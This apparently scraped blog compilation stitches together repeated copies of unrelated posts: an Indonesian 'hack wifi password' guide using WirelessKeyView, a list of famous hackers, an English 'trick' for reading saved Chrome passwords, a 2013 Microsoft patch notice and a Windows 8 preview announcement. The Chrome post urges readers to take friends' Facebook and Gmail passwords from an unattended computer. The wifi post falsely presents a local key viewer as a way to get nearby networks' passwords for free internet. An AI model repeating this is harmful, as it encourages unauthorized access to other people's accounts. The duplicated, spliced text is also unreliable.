Berikut adalah tutorialnya yang perlu anda ketahui bahwa hack password wifi versi ini menggunakan software WirelessKeyView. Nah anda tidak perlu bingung karena penggunaan software ini sangat mudah dan tidak perlu diinstal terlebih dahulu. Jika anda sudah mengunduh tool tersebut, silahkan buka WirelessKeyView dan ia akan langsung mencari jaringan wifi secara otomatis yang terproteksi password maupun yang free.

Jika sudah siap, silahkan untuk mengcopy langsung password ke wifi yang terproteksi oleh password. Copy kalimat atau angka atau huruf atau simbol lain yang ada di bagian Key (Ascii).

Untuk mencobanya silahkan download tool dibawah ini:

Download

Anda mau ngenet tapi dana lagi pas-pasan? Mau internetan gratis tapi kesulitan mencari tahu password wifi ? Nah barangkali tutorial ini bisa memudahkan anda mendapatkan koneksi via wifi yang tersedia di tempat anda, sehingga anda bisa menikmati fasilitas wifi dengan cuma-cuma.

Cara hack Password Wifi ini berasal dari sebuah tool sederhana yang akan membantu kita mencari jaringan wifi terdekat, sekaligus memberitahu apa password yang digunakan. Dengan cara ini anda tidak perlu lagi bingung berpindah-pindah tempat hanya untuk mencari internet gratis.

Apabila anda ingin menikmati fasilitas tool ini, sudah pasti anda diwajibkan untuk melakukan download guna mendapatkan tool hack password wifi yang dimaksud.

Berikut adalah tutorialnya yang perlu anda ketahui bahwa hack password wifi versi ini menggunakan software WirelessKeyView. Nah anda tidak perlu bingung karena penggunaan software ini sangat mudah dan tidak perlu diinstal terlebih dahulu. Jika anda sudah mengunduh tool tersebut, silahkan buka WirelessKeyView dan ia akan langsung mencari jaringan wifi secara otomatis yang terproteksi password maupun yang free.

Jika sudah siap, silahkan untuk mengcopy langsung password ke wifi yang terproteksi oleh password. Copy kalimat atau angka atau huruf atau simbol lain yang ada di bagian Key (Ascii).

Untuk mencobanya silahkan download tool dibawah ini:

Download

Anda mau ngenet tapi dana lagi pas-pasan? Mau internetan gratis tapi kesulitan mencari tahu password wifi ? Nah barangkali tutorial ini bisa memudahkan anda mendapatkan koneksi via wifi yang tersedia di tempat anda, sehingga anda bisa menikmati fasilitas wifi dengan cuma-cuma.

Cara hack Password Wifi ini berasal dari sebuah tool sederhana yang akan membantu kita mencari jaringan wifi terdekat, sekaligus memberitahu apa password yang digunakan. Dengan cara ini anda tidak perlu lagi bingung berpindah-pindah tempat hanya untuk mencari internet gratis.

Apabila anda ingin menikmati fasilitas tool ini, sudah pasti anda diwajibkan untuk melakukan download guna mendapatkan tool hack password wifi yang dimaksud.

Berikut adalah tutorialnya yang perlu anda ketahui bahwa hack password wifi versi ini menggunakan software WirelessKeyView. Nah anda tidak perlu bingung karena penggunaan software ini sangat mudah dan tidak perlu diinstal terlebih dahulu. Jika anda sudah mengunduh tool tersebut, silahkan buka WirelessKeyView dan ia akan langsung mencari jaringan wifi secara otomatis yang terproteksi password maupun yang free.

Jika sudah siap, silahkan untuk mengcopy langsung password ke wifi yang terproteksi oleh password. Copy kalimat atau angka atau huruf atau simbol lain yang ada di bagian Key (Ascii).

Untuk mencobanya silahkan download tool dibawah ini:

Download

Anda mau ngenet tapi dana lagi pas-pasan? Mau internetan gratis tapi kesulitan mencari tahu password wifi ? Nah barangkali tutorial ini bisa memudahkan anda mendapatkan koneksi via wifi yang tersedia di tempat anda, sehingga anda bisa menikmati fasilitas wifi dengan cuma-cuma.

Cara hack Password Wifi ini berasal dari sebuah tool sederhana yang akan membantu kita mencari jaringan wifi terdekat, sekaligus memberitahu apa password yang digunakan. Dengan cara ini anda tidak perlu lagi bingung berpindah-pindah tempat hanya untuk mencari internet gratis.

Apabila anda ingin menikmati fasilitas tool ini, sudah pasti anda diwajibkan untuk melakukan download guna mendapatkan tool hack password wifi yang dimaksud.

Berikut adalah tutorialnya yang perlu anda ketahui bahwa hack password wifi versi ini menggunakan software WirelessKeyView. Nah anda tidak perlu bingung karena penggunaan software ini sangat mudah dan tidak perlu diinstal terlebih dahulu. Jika anda sudah mengunduh tool tersebut, silahkan buka WirelessKeyView dan ia akan langsung mencari jaringan wifi secara otomatis yang terproteksi password maupun yang free.

Jika sudah siap, silahkan untuk mengcopy langsung password ke wifi yang terproteksi oleh password. Copy kalimat atau angka atau huruf atau simbol lain yang ada di bagian Key (Ascii).

Untuk mencobanya silahkan download tool dibawah ini:

Download

7 Hacker Terhebat Di Dunia

Pada dasarnya Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

Tapi, justru banyak hacker yang menggunakan program jaringan buatan mereka untuk berbuat hal yang negatif, misalnya mencuri password akun, membobol kunci keamanan suatu situs, dan lain-lain. Dan bahkan sekarang, image hacker dimata umum justru dipandang sebagai seorang kriminal di dalam dunia cyber. Dan memang tak dapat disangkal bahwa otak para hacker memang encer-encer. Apalagi di jaman sekarang ini, makin banyak hacker yang saling bersaing untuk menjadi yang terbaik

Berikut adalah daftar 7 Hacker terbaik di Dunia saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster “FBI Most Wanted”.Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.Merasa terganggu oleh software komersial dan dan hak cipta pribadi.Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.
 
7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

Pada dasarnya Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

Tapi, justru banyak hacker yang menggunakan program jaringan buatan mereka untuk berbuat hal yang negatif, misalnya mencuri password akun, membobol kunci keamanan suatu situs, dan lain-lain. Dan bahkan sekarang, image hacker dimata umum justru dipandang sebagai seorang kriminal di dalam dunia cyber. Dan memang tak dapat disangkal bahwa otak para hacker memang encer-encer. Apalagi di jaman sekarang ini, makin banyak hacker yang saling bersaing untuk menjadi yang terbaik

Berikut adalah daftar 7 Hacker terbaik di Dunia saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster “FBI Most Wanted”.Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.Merasa terganggu oleh software komersial dan dan hak cipta pribadi.Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.
 
7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

Pada dasarnya Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

Tapi, justru banyak hacker yang menggunakan program jaringan buatan mereka untuk berbuat hal yang negatif, misalnya mencuri password akun, membobol kunci keamanan suatu situs, dan lain-lain. Dan bahkan sekarang, image hacker dimata umum justru dipandang sebagai seorang kriminal di dalam dunia cyber. Dan memang tak dapat disangkal bahwa otak para hacker memang encer-encer. Apalagi di jaman sekarang ini, makin banyak hacker yang saling bersaing untuk menjadi yang terbaik

Berikut adalah daftar 7 Hacker terbaik di Dunia saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster “FBI Most Wanted”.Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.Merasa terganggu oleh software komersial dan dan hak cipta pribadi.Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.
 
7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

Pada dasarnya Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

Tapi, justru banyak hacker yang menggunakan program jaringan buatan mereka untuk berbuat hal yang negatif, misalnya mencuri password akun, membobol kunci keamanan suatu situs, dan lain-lain. Dan bahkan sekarang, image hacker dimata umum justru dipandang sebagai seorang kriminal di dalam dunia cyber. Dan memang tak dapat disangkal bahwa otak para hacker memang encer-encer. Apalagi di jaman sekarang ini, makin banyak hacker yang saling bersaing untuk menjadi yang terbaik

Berikut adalah daftar 7 Hacker terbaik di Dunia saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster “FBI Most Wanted”.Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.Merasa terganggu oleh software komersial dan dan hak cipta pribadi.Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.
 
7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

Pada dasarnya Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

Tapi, justru banyak hacker yang menggunakan program jaringan buatan mereka untuk berbuat hal yang negatif, misalnya mencuri password akun, membobol kunci keamanan suatu situs, dan lain-lain. Dan bahkan sekarang, image hacker dimata umum justru dipandang sebagai seorang kriminal di dalam dunia cyber. Dan memang tak dapat disangkal bahwa otak para hacker memang encer-encer. Apalagi di jaman sekarang ini, makin banyak hacker yang saling bersaing untuk menjadi yang terbaik

Berikut adalah daftar 7 Hacker terbaik di Dunia saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster “FBI Most Wanted”.Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.Merasa terganggu oleh software komersial dan dan hak cipta pribadi.Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.
 
7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

More Simple Way To View Saved Password in Google Chrome

google chrome hacked
Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.



How to view saved password in google chrome ?

  1. Open Google Chrome
  2. Go to Settings (Its on the Right Corner)
  3. Then Click on Advance Settings
  4. Scroll Down and their will be password and forms from their click on Manage saved password.
  5. Then list of all websites whose passwords are saved on browser will be listed.
  6. Click on show to view those passwords
  7. Enjoy!!

google chrome hacked
Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.



How to view saved password in google chrome ?

  1. Open Google Chrome
  2. Go to Settings (Its on the Right Corner)
  3. Then Click on Advance Settings
  4. Scroll Down and their will be password and forms from their click on Manage saved password.
  5. Then list of all websites whose passwords are saved on browser will be listed.
  6. Click on show to view those passwords
  7. Enjoy!!

google chrome hacked
Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.



How to view saved password in google chrome ?

  1. Open Google Chrome
  2. Go to Settings (Its on the Right Corner)
  3. Then Click on Advance Settings
  4. Scroll Down and their will be password and forms from their click on Manage saved password.
  5. Then list of all websites whose passwords are saved on browser will be listed.
  6. Click on show to view those passwords
  7. Enjoy!!

google chrome hacked
Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.



How to view saved password in google chrome ?

  1. Open Google Chrome
  2. Go to Settings (Its on the Right Corner)
  3. Then Click on Advance Settings
  4. Scroll Down and their will be password and forms from their click on Manage saved password.
  5. Then list of all websites whose passwords are saved on browser will be listed.
  6. Click on show to view those passwords
  7. Enjoy!!

google chrome hacked
Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.



How to view saved password in google chrome ?

  1. Open Google Chrome
  2. Go to Settings (Its on the Right Corner)
  3. Then Click on Advance Settings
  4. Scroll Down and their will be password and forms from their click on Manage saved password.
  5. Then list of all websites whose passwords are saved on browser will be listed.
  6. Click on show to view those passwords
  7. Enjoy!!

Microsoft will roll out fix for two critical flaws in Windows and Internet Explorer

Microsoft has released an advance notification of 9 security bulletins that it plans to release on April 9, 2013. Microsoft said it will patch nine vulnerabilities in total and two of them rated critical and that of the remaining 7 as Important.
Patch Tuesday
The critical vulnerabilities are remote code execution issues. First vulnerability affects Microsoft Windows and Internet Explorer while the second vulnerability affects Microsoft Windows. 
The vulnerability will fix a flaw that allows a drive-by attack, which hackers can exploit to attack machines running the software using malware loaded websites. Earlier this year, Microsoft released an emergency update for Internet Explorer after all the commotion about the security holes in Java. The update aimed to patch a security vulnerability in Internet Explorer that is being used for attacks on government contractors and other organisations.
The remaining 7 vulnerabilities pertain to issues affecting Microsoft Office, Microsoft Server Software and Microsoft Windows. Microsoft will host a webcast to address customer questions on the security bulletins on April 10, 2013, at 11:00 AM Pacific Time (US & Canada).

Microsoft has released an advance notification of 9 security bulletins that it plans to release on April 9, 2013. Microsoft said it will patch nine vulnerabilities in total and two of them rated critical and that of the remaining 7 as Important.
Patch Tuesday
The critical vulnerabilities are remote code execution issues. First vulnerability affects Microsoft Windows and Internet Explorer while the second vulnerability affects Microsoft Windows. 
The vulnerability will fix a flaw that allows a drive-by attack, which hackers can exploit to attack machines running the software using malware loaded websites. Earlier this year, Microsoft released an emergency update for Internet Explorer after all the commotion about the security holes in Java. The update aimed to patch a security vulnerability in Internet Explorer that is being used for attacks on government contractors and other organisations.
The remaining 7 vulnerabilities pertain to issues affecting Microsoft Office, Microsoft Server Software and Microsoft Windows. Microsoft will host a webcast to address customer questions on the security bulletins on April 10, 2013, at 11:00 AM Pacific Time (US & Canada).

Microsoft has released an advance notification of 9 security bulletins that it plans to release on April 9, 2013. Microsoft said it will patch nine vulnerabilities in total and two of them rated critical and that of the remaining 7 as Important.
Patch Tuesday
The critical vulnerabilities are remote code execution issues. First vulnerability affects Microsoft Windows and Internet Explorer while the second vulnerability affects Microsoft Windows. 
The vulnerability will fix a flaw that allows a drive-by attack, which hackers can exploit to attack machines running the software using malware loaded websites. Earlier this year, Microsoft released an emergency update for Internet Explorer after all the commotion about the security holes in Java. The update aimed to patch a security vulnerability in Internet Explorer that is being used for attacks on government contractors and other organisations.
The remaining 7 vulnerabilities pertain to issues affecting Microsoft Office, Microsoft Server Software and Microsoft Windows. Microsoft will host a webcast to address customer questions on the security bulletins on April 10, 2013, at 11:00 AM Pacific Time (US & Canada).

Microsoft has released an advance notification of 9 security bulletins that it plans to release on April 9, 2013. Microsoft said it will patch nine vulnerabilities in total and two of them rated critical and that of the remaining 7 as Important.
Patch Tuesday
The critical vulnerabilities are remote code execution issues. First vulnerability affects Microsoft Windows and Internet Explorer while the second vulnerability affects Microsoft Windows. 
The vulnerability will fix a flaw that allows a drive-by attack, which hackers can exploit to attack machines running the software using malware loaded websites. Earlier this year, Microsoft released an emergency update for Internet Explorer after all the commotion about the security holes in Java. The update aimed to patch a security vulnerability in Internet Explorer that is being used for attacks on government contractors and other organisations.
The remaining 7 vulnerabilities pertain to issues affecting Microsoft Office, Microsoft Server Software and Microsoft Windows. Microsoft will host a webcast to address customer questions on the security bulletins on April 10, 2013, at 11:00 AM Pacific Time (US & Canada).

Microsoft has released an advance notification of 9 security bulletins that it plans to release on April 9, 2013. Microsoft said it will patch nine vulnerabilities in total and two of them rated critical and that of the remaining 7 as Important.
Patch Tuesday
The critical vulnerabilities are remote code execution issues. First vulnerability affects Microsoft Windows and Internet Explorer while the second vulnerability affects Microsoft Windows. 
The vulnerability will fix a flaw that allows a drive-by attack, which hackers can exploit to attack machines running the software using malware loaded websites. Earlier this year, Microsoft released an emergency update for Internet Explorer after all the commotion about the security holes in Java. The update aimed to patch a security vulnerability in Internet Explorer that is being used for attacks on government contractors and other organisations.
The remaining 7 vulnerabilities pertain to issues affecting Microsoft Office, Microsoft Server Software and Microsoft Windows. Microsoft will host a webcast to address customer questions on the security bulletins on April 10, 2013, at 11:00 AM Pacific Time (US & Canada).

Free Download Windows 8 Consumer Preview Released Officially

Download Windows 8 Consumer Preview - Many of us might be curious with the new looks of Windows 8 before it launched. Yes, of course before it launched, the Microsoft Inc always create a preview version for consumer, including for this Windows 8 which released in beta version before its final for public, which this preview version will almost the same with the final version of Windows 8 or at least You know how it looks like.

Windows 8 consumer preview comes up with some features its own, like: Internet Exploler 10, Metro UI Style, Xbox 360 Integration, Windows Store, Cloud SkyDrive support, multy touch, Native USB 3.0 Support, Secure Boot, and more. And for those a BloggerClick's visitors who want to install this Windows 8 consumer preview, I guess You wouldn't get an issue because Windows 8 consumer preview has a low system requirements its own, so that it's not make You annoyed when You're going to install it.




System requirements:
- Processor: Min 1 GHz,
- RAM memory: 1GB (32-bit) / 2 GB RAM (64-bit)
- Hardisk Space: 16 GB (32-bit) / 20 GB (64-bit),
- VGA: Compatible with DirectX 9 and WDDM 1.0.

However, You need to note that this Windows 8 consumer preview come up in beta version, so it's probably you will find some of bugs or it's not compatible with the PC's hardware You have. But for those who has curiosity with this Windows 8 Consumer Preview You can download the link from Official website of Microsoft.

Download Windows 8 Consumer Preview - Many of us might be curious with the new looks of Windows 8 before it launched. Yes, of course before it launched, the Microsoft Inc always create a preview version for consumer, including for this Windows 8 which released in beta version before its final for public, which this preview version will almost the same with the final version of Windows 8 or at least You know how it looks like.

Windows 8 consumer preview comes up with some features its own, like: Internet Exploler 10, Metro UI Style, Xbox 360 Integration, Windows Store, Cloud SkyDrive support, multy touch, Native USB 3.0 Support, Secure Boot, and more. And for those a BloggerClick's visitors who want to install this Windows 8 consumer preview, I guess You wouldn't get an issue because Windows 8 consumer preview has a low system requirements its own, so that it's not make You annoyed when You're going to install it.




System requirements:
- Processor: Min 1 GHz,
- RAM memory: 1GB (32-bit) / 2 GB RAM (64-bit)
- Hardisk Space: 16 GB (32-bit) / 20 GB (64-bit),
- VGA: Compatible with DirectX 9 and WDDM 1.0.

However, You need to note that this Windows 8 consumer preview come up in beta version, so it's probably you will find some of bugs or it's not compatible with the PC's hardware You have. But for those who has curiosity with this Windows 8 Consumer Preview You can download the link from Official website of Microsoft.

Download Windows 8 Consumer Preview - Many of us might be curious with the new looks of Windows 8 before it launched. Yes, of course before it launched, the Microsoft Inc always create a preview version for consumer, including for this Windows 8 which released in beta version before its final for public, which this preview version will almost the same with the final version of Windows 8 or at least You know how it looks like.

Windows 8 consumer preview comes up with some features its own, like: Internet Exploler 10, Metro UI Style, Xbox 360 Integration, Windows Store, Cloud SkyDrive support, multy touch, Native USB 3.0 Support, Secure Boot, and more. And for those a BloggerClick's visitors who want to install this Windows 8 consumer preview, I guess You wouldn't get an issue because Windows 8 consumer preview has a low system requirements its own, so that it's not make You annoyed when You're going to install it.




System requirements:
- Processor: Min 1 GHz,
- RAM memory: 1GB (32-bit) / 2 GB RAM (64-bit)
- Hardisk Space: 16 GB (32-bit) / 20 GB (64-bit),
- VGA: Compatible with DirectX 9 and WDDM 1.0.

However, You need to note that this Windows 8 consumer preview come up in beta version, so it's probably you will find some of bugs or it's not compatible with the PC's hardware You have. But for those who has curiosity with this Windows 8 Consumer Preview You can download the link from Official website of Microsoft.

Download Windows 8 Consumer Preview - Many of us might be curious with the new looks of Windows 8 before it launched. Yes, of course before it launched, the Microsoft Inc always create a preview version for consumer, including for this Windows 8 which released in beta version before its final for public, which this preview version will almost the same with the final version of Windows 8 or at least You know how it looks like.

